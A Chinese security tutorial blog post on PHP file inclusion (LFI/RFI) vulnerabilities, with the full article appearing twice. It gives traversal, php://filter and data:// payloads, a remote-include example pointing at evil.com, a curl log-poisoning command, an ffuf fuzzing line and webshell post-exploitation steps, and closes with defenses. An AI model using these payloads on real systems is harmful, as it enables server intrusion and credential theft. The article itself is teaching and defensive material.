1. 项目概述文件包含漏洞的“潘多拉魔盒”在Web安全测试的日常工作中我们常常把目光聚焦在SQL注入、XSS跨站脚本这些“明星”漏洞上它们逻辑直观危害明显是渗透测试报告里的常客。但今天我想聊一个同样危险却时常被初级开发者甚至部分安全人员低估的“隐形杀手”——文件包含漏洞。它就像程序逻辑中一个被遗忘的“后门”攻击者通过这个后门可以绕过常规的访问控制直接读取、甚至执行服务器上的任意文件。我见过太多因为一个不起眼的include或require函数参数未加过滤导致整个服务器沦陷的案例。这个漏洞的原理并不复杂但它的利用方式多样危害深远从敏感信息泄露到远程代码执行RCE往往只在一念之间。无论你是刚入行的安全研究员还是负责后端开发的工程师理解文件包含漏洞的机理、挖掘方法和防御策略都是构建安全防线的必修课。接下来我将结合十多年一线实战中遇到的真实案例和踩过的坑为你彻底拆解这个漏洞的前世今生。2. 漏洞原理深度剖析当“包含”失去控制要理解文件包含漏洞首先得明白在PHP、JSP等服务器端脚本语言中“文件包含”这个机制设计的初衷。它的本意是为了提高代码的复用性和可维护性比如将数据库连接配置、页头页尾、通用函数库等公共部分写成独立的文件然后在多个页面中通过include、require、include_once、require_oncePHP或jsp:includeJSP等函数引入。这本身是一个优秀的编程实践。2.1 核心问题动态包含与用户输入的交织漏洞产生的根源在于“动态文件包含”。当包含文件的路径或文件名不是硬编码在程序里而是通过用户输入的参数如$_GET[‘file’]、$_POST[‘page’]来动态拼接时危险就悄然降临了。设想这样一个简单的PHP代码片段?php $page $_GET[page]; include(/pages/ . $page . .php); ?开发者的本意可能是用户访问index.php?pageabout程序就包含/pages/about.php文件并展示“关于我们”页面。看起来合情合理。然而攻击者的思维不会局限于此。如果用户传入的page参数是../../../etc/passwd呢拼接后的路径就变成了/pages/../../../etc/passwd经过系统路径解析最终会指向/etc/passwd这个系统敏感文件。服务器成功“包含”并输出了这个文件的内容敏感信息就此泄露。这就是本地文件包含Local File Inclusion, LFI。更危险的是如果PHP配置不当allow_url_includeOn攻击者甚至可以传入一个远程URL如http://evil.com/shell.txt。那么include函数就会去包含这个远程服务器上的文件并将其内容作为PHP代码执行。这意味着攻击者可以将恶意代码Webshell放在自己的服务器上然后让目标服务器去下载并执行从而完全控制目标服务器。这就是远程文件包含Remote File Inclusion, RFI。RFI的危害等级通常直接等同于RCE。2.2 关键配置与协议封装器的“助攻”文件包含漏洞的利用深度和广度与服务器环境配置紧密相关。以下几个点需要特别关注PHP配置指令allow_url_fopen是否允许打开远程文件如http://,ftp://。它为RFI提供了可能。allow_url_include是否允许include/require等函数包含远程文件。这是RFI的直接开关。在现代PHP版本中此选项默认已关闭极大地降低了RFI风险但历史遗留系统或错误配置仍可能存在。协议封装器Wrapper的妙用与滥用这是LFI漏洞利用中“化腐朽为神奇”的关键。即使不能包含远程文件利用PHP内置的多种协议封装器也能将LFI升级为代码执行或信息泄露。php://filter最常用的封装器。它可以用来读取文件源码而不是执行它。例如php://filter/readconvert.base64-encode/resourceindex.php。这会将index.php文件的内容进行Base64编码后输出。为什么这样做因为直接包含.php文件其中的代码会被执行我们看不到源码。通过filter进行编码输出我们就能获取到编码后的源码解码后即可进行白盒审计。php://input可以访问请求的原始数据流。在POST请求体中直接写入PHP代码然后包含php://input这些代码就会被执行。这需要allow_url_include开启但有时在特定环境下可作为备用手段。data://同样可以将代码写入包含语句中执行。例如data://text/plain,?php phpinfo();?。zip://,phar://可用于触发反序列化漏洞或包含压缩包内的文件是更高级的利用手法。注意协议封装器的利用是文件包含漏洞检测和利用中极具技巧性的部分。它突破了“仅能读取非PHP文件”的限制是安全测试人员必须掌握的技能。3. 漏洞挖掘与手动测试实战指南知道了原理我们如何在实战中寻找和验证文件包含漏洞呢它不像SQL注入有‘和and 11那么明显的特征。更多时候需要我们对程序功能点进行观察和推理。3.1 漏洞点发现寻找那些“可能”在包含文件的参数文件包含漏洞常出现在以下功能模块或参数中模板加载/主题切换?templateblue,?skindefault多语言支持?langen,?languagechinese文件查看/下载?filereport.pdf,?downloadmanual.zip页面包含/模块调用?pageabout,?modulenews,?incheader日志文件查看?logaccess.log在测试时要重点关注URL中看起来像是引用了一个子页面或资源文件的参数。使用Burp Suite等工具抓包观察所有请求参数。3.2 手动测试步骤与技巧假设我们找到一个疑似点http://target.com/index.php?filenews.php基础LFI测试尝试目录遍历?file../../../../etc/passwd尝试绝对路径?file/etc/passwd(Windows下可能是?fileC:\windows\win.ini)尝试包含Web目录下的其他文件?file../config/database.php(猜测可能存在配置文件)技巧观察错误信息。如果包含一个不存在的文件程序是报错显示路径信息还是跳转到首页报错信息可能泄露Web绝对路径这对后续利用至关重要。绕过常见防御 开发者不会坐以待毙他们通常会添加一些过滤。我们需要尝试绕过。后缀名拼接如果代码是include($file . “.php”)我们传入../../etc/passwd%00空字节截断。在PHP旧版本5.3.4中%00空字符可以截断后面的字符串使得.php后缀失效。但此方法在现代PHP中已基本失效。路径过滤如果代码过滤了../可以尝试双重编码..%252f%25是%的URL编码或者使用....//在某些场景下会被递归删除成../。前缀限制如果代码要求路径必须以/pages/开头如include(‘/pages/’ . $file)可以尝试利用目录遍历跳出该限制?file../../../etc/passwd最终路径为/pages/../../../etc/passwd。利用协议封装器进行深入探测 当确认存在LFI但无法直接执行代码时协议封装器是突破口。读取源码?filephp://filter/readconvert.base64-encode/resourceindex.php将返回的Base64字符串解码即可获得index.php的源代码。用同样的方法可以读取config.php、db_conn.php等关键文件寻找数据库密码、API密钥等。测试RFI?filehttp://your-vps.com/test.txt其中test.txt内容为?php phpinfo();?。观察响应中是否出现了phpinfo页面。此操作需谨慎并确保在合法授权范围内进行避免对生产环境造成影响。日志文件注入Log Poisoning—— LFI到RCE的经典桥梁 这是我最喜欢也是实战中最有效的技巧之一。思路是既然能包含服务器上的文件而服务器的访问日志如/var/log/apache2/access.log是一个不断被写入新内容的文件那么如果我们能把PHP代码“注入”到日志文件里再去包含这个日志文件代码不就被执行了吗步骤通过LFI漏洞确认可以读取Web日志例如?file../../../var/log/apache2/access.log。在User-Agent或HTTP请求头中插入PHP代码。例如使用curlcurl -H “User-Agent: ?php system(‘id’); ?” http://target.com/。再次利用LFI包含这个日志文件?file../../../var/log/apache2/access.log。此时日志文件中的?php system(‘id’);?会被服务器当作PHP代码执行返回命令id的执行结果。关键点你需要知道日志文件的绝对路径。常见的路径有Apache:/var/log/apache2/access.log,/var/log/httpd/access_logNginx:/var/log/nginx/access.logSSH:/var/log/auth.log(如果Web服务用户有读权限并且你通过SSH错误登录注入代码)实操心得在测试LFI时我总会准备一个包含常见绝对路径的字典用于快速Fuzz。同时日志注入的成功率很高因为它不依赖于特殊的PHP配置只依赖于日志文件可读和可包含。一旦成功就意味着拿到了一个稳定的命令执行入口。4. 自动化工具辅助与高级利用场景手动测试能锻炼思维但在时间有限的渗透测试中合理使用工具能极大提升效率。4.1 工具推荐与使用逻辑FFuF (Fuzz Faster U Fool)这是当前最强大的Fuzz工具之一。用于快速枚举可能的包含路径。ffuf -w /path/to/LFI-wordlist.txt -u http://target.com/index.php?fileFUZZ -fs 4242-fs 4242表示过滤掉大小为4242字节的响应可能是“文件不存在”的统一错误页面从而快速找出有效的文件路径。字典需要包含../../etc/passwd、....//....//etc/passwd、php://filter等各种Payload。Burp Suite Intruder对于需要复杂参数处理或状态维持的测试Burp Intruder的“Pitchfork”或“Cluster bomb”攻击类型非常有用。你可以同时Fuzz路径和协议封装器的类型。自定义脚本对于特定的过滤规则编写简单的Python脚本进行迭代测试往往最有效。例如尝试所有可能的字符编码绕过。4.2 高级利用场景从信息泄露到完整渗透一个简单的文件包含如何演变成一次完整的服务器攻陷其路径往往是这样的初始立足点通过?file../../../etc/passwd确认LFI漏洞存在。信息收集包含/proc/self/environ文件。这个文件包含了当前进程的环境变量其中可能含有HTTP_USER_AGENT、HTTP_REFERER等可通过这些字段进行日志注入。包含/proc/self/fd/目录下的文件描述符有时能读到临时文件。读取Web应用源码寻找数据库凭证、其他API接口密钥或隐藏的管理后台路径。权限提升与横向移动通过日志注入或php://input获得Web Shell。利用Web Shell探索服务器查看/home目录下其他用户文件寻找SSH私钥。尝试读取/etc/shadow需要root权限通常读不到但可以读取当前用户的历史命令文件如.bash_history可能发现密码或其他敏感操作。如果服务器上运行着其他服务如MySQL、Redis并且从源码中找到了密码可以进行数据库渗透尝试导出数据或通过MySQL写入新的Web Shell。5. 防御策略从开发到部署的立体防护攻击手段层出不穷防御也必须多管齐下。下面从开发者和运维人员两个角度谈谈如何筑起防线。5.1 开发阶段白名单与硬编码是王道绝对禁止动态包含用户输入这是最根本的原则。如果业务逻辑必须动态包含请采用以下方法白名单机制维护一个允许包含的文件名数组用户输入只作为索引或键值。$allowed_pages array(‘home’ ‘home.php’, ‘about’ ‘about.php’, ‘contact’ ‘contact.php’); $page $_GET[‘page’]; if (array_key_exists($page, $allowed_pages)) { include(‘./templates/’ . $allowed_pages[$page]); } else { include(‘./templates/error.php’); }硬编码映射使用switch-case语句将输入映射到固定的文件路径。switch ($_GET[‘module’]) { case ‘news’: $file ‘modules/news.php’; break; case ‘user’: $file ‘modules/user/profile.php’; break; default: $file ‘modules/home.php’; } include($file);严格过滤与校验如果白名单难以实现在一些老旧或复杂系统中必须进行严格过滤。去除所有../、..\等目录遍历字符。将输入限制为字母、数字、下划线、短横线等安全字符。使用basename()函数获取路径中的文件名部分自动去除目录。注意过滤逻辑要严谨避免被绕过。例如不能只替换一次../要循环替换直到字符串中不再包含为止。设置包含目录限制open_basedir在PHP配置中通过open_basedir指令将PHP可操作的文件限制在指定的目录树中。这虽然不是万无一失但能有效限制攻击者跳转到系统关键目录。open_basedir /var/www/html:/tmp5.2 运维与配置阶段最小权限与安全配置关闭危险配置这是阻断RFI和限制LFi危害的最有效手段。确保allow_url_include Off默认已是Off但务必检查。如非必要将allow_url_fopen也设置为Off。在生产环境中修改php.ini后务必重启PHP服务如php-fpm或Web服务器。运行在最小权限下Web服务器进程如www-data, nginx用户应以非root、低权限用户身份运行。确保Web用户对网站根目录外的文件如/etc/,/home没有读取权限。即使存在LFI也无法读取系统关键文件。对日志目录的权限进行严格控制避免Web用户有写权限防止日志被篡改但通常需要读权限以供分析。这是一个需要权衡的点。定期更新与安全审计保持PHP、Web服务器Apache/Nginx及所有应用框架的最新版本及时修补已知漏洞。对线上代码进行定期的安全扫描和代码审计特别关注文件操作函数include,require,file_get_contents,readfile等的参数是否用户可控。5.3 Web应用防火墙WAF规则在应用层部署WAF可以设置规则拦截包含../、php://、etc/passwd等敏感字符串的请求。但WAF是缓解措施不能替代安全的代码编写。文件包含漏洞的攻防是一场关于“控制”的博弈。攻击者想尽办法让“包含”这个行为失控而防御者则需在设计和实现的每一个环节牢牢锁死可控的范围。理解它的原理掌握它的利用技巧最终是为了更好地从源头消灭它。在代码中每一个来自外部的输入都值得用最谨慎的眼光去审视这才是安全开发的起点。
文件包含漏洞深度解析:从LFI/RFI原理到实战防御策略
发布时间:2026/6/23 10:46:29
1. 项目概述文件包含漏洞的“潘多拉魔盒”在Web安全测试的日常工作中我们常常把目光聚焦在SQL注入、XSS跨站脚本这些“明星”漏洞上它们逻辑直观危害明显是渗透测试报告里的常客。但今天我想聊一个同样危险却时常被初级开发者甚至部分安全人员低估的“隐形杀手”——文件包含漏洞。它就像程序逻辑中一个被遗忘的“后门”攻击者通过这个后门可以绕过常规的访问控制直接读取、甚至执行服务器上的任意文件。我见过太多因为一个不起眼的include或require函数参数未加过滤导致整个服务器沦陷的案例。这个漏洞的原理并不复杂但它的利用方式多样危害深远从敏感信息泄露到远程代码执行RCE往往只在一念之间。无论你是刚入行的安全研究员还是负责后端开发的工程师理解文件包含漏洞的机理、挖掘方法和防御策略都是构建安全防线的必修课。接下来我将结合十多年一线实战中遇到的真实案例和踩过的坑为你彻底拆解这个漏洞的前世今生。2. 漏洞原理深度剖析当“包含”失去控制要理解文件包含漏洞首先得明白在PHP、JSP等服务器端脚本语言中“文件包含”这个机制设计的初衷。它的本意是为了提高代码的复用性和可维护性比如将数据库连接配置、页头页尾、通用函数库等公共部分写成独立的文件然后在多个页面中通过include、require、include_once、require_oncePHP或jsp:includeJSP等函数引入。这本身是一个优秀的编程实践。2.1 核心问题动态包含与用户输入的交织漏洞产生的根源在于“动态文件包含”。当包含文件的路径或文件名不是硬编码在程序里而是通过用户输入的参数如$_GET[‘file’]、$_POST[‘page’]来动态拼接时危险就悄然降临了。设想这样一个简单的PHP代码片段?php $page $_GET[page]; include(/pages/ . $page . .php); ?开发者的本意可能是用户访问index.php?pageabout程序就包含/pages/about.php文件并展示“关于我们”页面。看起来合情合理。然而攻击者的思维不会局限于此。如果用户传入的page参数是../../../etc/passwd呢拼接后的路径就变成了/pages/../../../etc/passwd经过系统路径解析最终会指向/etc/passwd这个系统敏感文件。服务器成功“包含”并输出了这个文件的内容敏感信息就此泄露。这就是本地文件包含Local File Inclusion, LFI。更危险的是如果PHP配置不当allow_url_includeOn攻击者甚至可以传入一个远程URL如http://evil.com/shell.txt。那么include函数就会去包含这个远程服务器上的文件并将其内容作为PHP代码执行。这意味着攻击者可以将恶意代码Webshell放在自己的服务器上然后让目标服务器去下载并执行从而完全控制目标服务器。这就是远程文件包含Remote File Inclusion, RFI。RFI的危害等级通常直接等同于RCE。2.2 关键配置与协议封装器的“助攻”文件包含漏洞的利用深度和广度与服务器环境配置紧密相关。以下几个点需要特别关注PHP配置指令allow_url_fopen是否允许打开远程文件如http://,ftp://。它为RFI提供了可能。allow_url_include是否允许include/require等函数包含远程文件。这是RFI的直接开关。在现代PHP版本中此选项默认已关闭极大地降低了RFI风险但历史遗留系统或错误配置仍可能存在。协议封装器Wrapper的妙用与滥用这是LFI漏洞利用中“化腐朽为神奇”的关键。即使不能包含远程文件利用PHP内置的多种协议封装器也能将LFI升级为代码执行或信息泄露。php://filter最常用的封装器。它可以用来读取文件源码而不是执行它。例如php://filter/readconvert.base64-encode/resourceindex.php。这会将index.php文件的内容进行Base64编码后输出。为什么这样做因为直接包含.php文件其中的代码会被执行我们看不到源码。通过filter进行编码输出我们就能获取到编码后的源码解码后即可进行白盒审计。php://input可以访问请求的原始数据流。在POST请求体中直接写入PHP代码然后包含php://input这些代码就会被执行。这需要allow_url_include开启但有时在特定环境下可作为备用手段。data://同样可以将代码写入包含语句中执行。例如data://text/plain,?php phpinfo();?。zip://,phar://可用于触发反序列化漏洞或包含压缩包内的文件是更高级的利用手法。注意协议封装器的利用是文件包含漏洞检测和利用中极具技巧性的部分。它突破了“仅能读取非PHP文件”的限制是安全测试人员必须掌握的技能。3. 漏洞挖掘与手动测试实战指南知道了原理我们如何在实战中寻找和验证文件包含漏洞呢它不像SQL注入有‘和and 11那么明显的特征。更多时候需要我们对程序功能点进行观察和推理。3.1 漏洞点发现寻找那些“可能”在包含文件的参数文件包含漏洞常出现在以下功能模块或参数中模板加载/主题切换?templateblue,?skindefault多语言支持?langen,?languagechinese文件查看/下载?filereport.pdf,?downloadmanual.zip页面包含/模块调用?pageabout,?modulenews,?incheader日志文件查看?logaccess.log在测试时要重点关注URL中看起来像是引用了一个子页面或资源文件的参数。使用Burp Suite等工具抓包观察所有请求参数。3.2 手动测试步骤与技巧假设我们找到一个疑似点http://target.com/index.php?filenews.php基础LFI测试尝试目录遍历?file../../../../etc/passwd尝试绝对路径?file/etc/passwd(Windows下可能是?fileC:\windows\win.ini)尝试包含Web目录下的其他文件?file../config/database.php(猜测可能存在配置文件)技巧观察错误信息。如果包含一个不存在的文件程序是报错显示路径信息还是跳转到首页报错信息可能泄露Web绝对路径这对后续利用至关重要。绕过常见防御 开发者不会坐以待毙他们通常会添加一些过滤。我们需要尝试绕过。后缀名拼接如果代码是include($file . “.php”)我们传入../../etc/passwd%00空字节截断。在PHP旧版本5.3.4中%00空字符可以截断后面的字符串使得.php后缀失效。但此方法在现代PHP中已基本失效。路径过滤如果代码过滤了../可以尝试双重编码..%252f%25是%的URL编码或者使用....//在某些场景下会被递归删除成../。前缀限制如果代码要求路径必须以/pages/开头如include(‘/pages/’ . $file)可以尝试利用目录遍历跳出该限制?file../../../etc/passwd最终路径为/pages/../../../etc/passwd。利用协议封装器进行深入探测 当确认存在LFI但无法直接执行代码时协议封装器是突破口。读取源码?filephp://filter/readconvert.base64-encode/resourceindex.php将返回的Base64字符串解码即可获得index.php的源代码。用同样的方法可以读取config.php、db_conn.php等关键文件寻找数据库密码、API密钥等。测试RFI?filehttp://your-vps.com/test.txt其中test.txt内容为?php phpinfo();?。观察响应中是否出现了phpinfo页面。此操作需谨慎并确保在合法授权范围内进行避免对生产环境造成影响。日志文件注入Log Poisoning—— LFI到RCE的经典桥梁 这是我最喜欢也是实战中最有效的技巧之一。思路是既然能包含服务器上的文件而服务器的访问日志如/var/log/apache2/access.log是一个不断被写入新内容的文件那么如果我们能把PHP代码“注入”到日志文件里再去包含这个日志文件代码不就被执行了吗步骤通过LFI漏洞确认可以读取Web日志例如?file../../../var/log/apache2/access.log。在User-Agent或HTTP请求头中插入PHP代码。例如使用curlcurl -H “User-Agent: ?php system(‘id’); ?” http://target.com/。再次利用LFI包含这个日志文件?file../../../var/log/apache2/access.log。此时日志文件中的?php system(‘id’);?会被服务器当作PHP代码执行返回命令id的执行结果。关键点你需要知道日志文件的绝对路径。常见的路径有Apache:/var/log/apache2/access.log,/var/log/httpd/access_logNginx:/var/log/nginx/access.logSSH:/var/log/auth.log(如果Web服务用户有读权限并且你通过SSH错误登录注入代码)实操心得在测试LFI时我总会准备一个包含常见绝对路径的字典用于快速Fuzz。同时日志注入的成功率很高因为它不依赖于特殊的PHP配置只依赖于日志文件可读和可包含。一旦成功就意味着拿到了一个稳定的命令执行入口。4. 自动化工具辅助与高级利用场景手动测试能锻炼思维但在时间有限的渗透测试中合理使用工具能极大提升效率。4.1 工具推荐与使用逻辑FFuF (Fuzz Faster U Fool)这是当前最强大的Fuzz工具之一。用于快速枚举可能的包含路径。ffuf -w /path/to/LFI-wordlist.txt -u http://target.com/index.php?fileFUZZ -fs 4242-fs 4242表示过滤掉大小为4242字节的响应可能是“文件不存在”的统一错误页面从而快速找出有效的文件路径。字典需要包含../../etc/passwd、....//....//etc/passwd、php://filter等各种Payload。Burp Suite Intruder对于需要复杂参数处理或状态维持的测试Burp Intruder的“Pitchfork”或“Cluster bomb”攻击类型非常有用。你可以同时Fuzz路径和协议封装器的类型。自定义脚本对于特定的过滤规则编写简单的Python脚本进行迭代测试往往最有效。例如尝试所有可能的字符编码绕过。4.2 高级利用场景从信息泄露到完整渗透一个简单的文件包含如何演变成一次完整的服务器攻陷其路径往往是这样的初始立足点通过?file../../../etc/passwd确认LFI漏洞存在。信息收集包含/proc/self/environ文件。这个文件包含了当前进程的环境变量其中可能含有HTTP_USER_AGENT、HTTP_REFERER等可通过这些字段进行日志注入。包含/proc/self/fd/目录下的文件描述符有时能读到临时文件。读取Web应用源码寻找数据库凭证、其他API接口密钥或隐藏的管理后台路径。权限提升与横向移动通过日志注入或php://input获得Web Shell。利用Web Shell探索服务器查看/home目录下其他用户文件寻找SSH私钥。尝试读取/etc/shadow需要root权限通常读不到但可以读取当前用户的历史命令文件如.bash_history可能发现密码或其他敏感操作。如果服务器上运行着其他服务如MySQL、Redis并且从源码中找到了密码可以进行数据库渗透尝试导出数据或通过MySQL写入新的Web Shell。5. 防御策略从开发到部署的立体防护攻击手段层出不穷防御也必须多管齐下。下面从开发者和运维人员两个角度谈谈如何筑起防线。5.1 开发阶段白名单与硬编码是王道绝对禁止动态包含用户输入这是最根本的原则。如果业务逻辑必须动态包含请采用以下方法白名单机制维护一个允许包含的文件名数组用户输入只作为索引或键值。$allowed_pages array(‘home’ ‘home.php’, ‘about’ ‘about.php’, ‘contact’ ‘contact.php’); $page $_GET[‘page’]; if (array_key_exists($page, $allowed_pages)) { include(‘./templates/’ . $allowed_pages[$page]); } else { include(‘./templates/error.php’); }硬编码映射使用switch-case语句将输入映射到固定的文件路径。switch ($_GET[‘module’]) { case ‘news’: $file ‘modules/news.php’; break; case ‘user’: $file ‘modules/user/profile.php’; break; default: $file ‘modules/home.php’; } include($file);严格过滤与校验如果白名单难以实现在一些老旧或复杂系统中必须进行严格过滤。去除所有../、..\等目录遍历字符。将输入限制为字母、数字、下划线、短横线等安全字符。使用basename()函数获取路径中的文件名部分自动去除目录。注意过滤逻辑要严谨避免被绕过。例如不能只替换一次../要循环替换直到字符串中不再包含为止。设置包含目录限制open_basedir在PHP配置中通过open_basedir指令将PHP可操作的文件限制在指定的目录树中。这虽然不是万无一失但能有效限制攻击者跳转到系统关键目录。open_basedir /var/www/html:/tmp5.2 运维与配置阶段最小权限与安全配置关闭危险配置这是阻断RFI和限制LFi危害的最有效手段。确保allow_url_include Off默认已是Off但务必检查。如非必要将allow_url_fopen也设置为Off。在生产环境中修改php.ini后务必重启PHP服务如php-fpm或Web服务器。运行在最小权限下Web服务器进程如www-data, nginx用户应以非root、低权限用户身份运行。确保Web用户对网站根目录外的文件如/etc/,/home没有读取权限。即使存在LFI也无法读取系统关键文件。对日志目录的权限进行严格控制避免Web用户有写权限防止日志被篡改但通常需要读权限以供分析。这是一个需要权衡的点。定期更新与安全审计保持PHP、Web服务器Apache/Nginx及所有应用框架的最新版本及时修补已知漏洞。对线上代码进行定期的安全扫描和代码审计特别关注文件操作函数include,require,file_get_contents,readfile等的参数是否用户可控。5.3 Web应用防火墙WAF规则在应用层部署WAF可以设置规则拦截包含../、php://、etc/passwd等敏感字符串的请求。但WAF是缓解措施不能替代安全的代码编写。文件包含漏洞的攻防是一场关于“控制”的博弈。攻击者想尽办法让“包含”这个行为失控而防御者则需在设计和实现的每一个环节牢牢锁死可控的范围。理解它的原理掌握它的利用技巧最终是为了更好地从源头消灭它。在代码中每一个来自外部的输入都值得用最谨慎的眼光去审视这才是安全开发的起点。
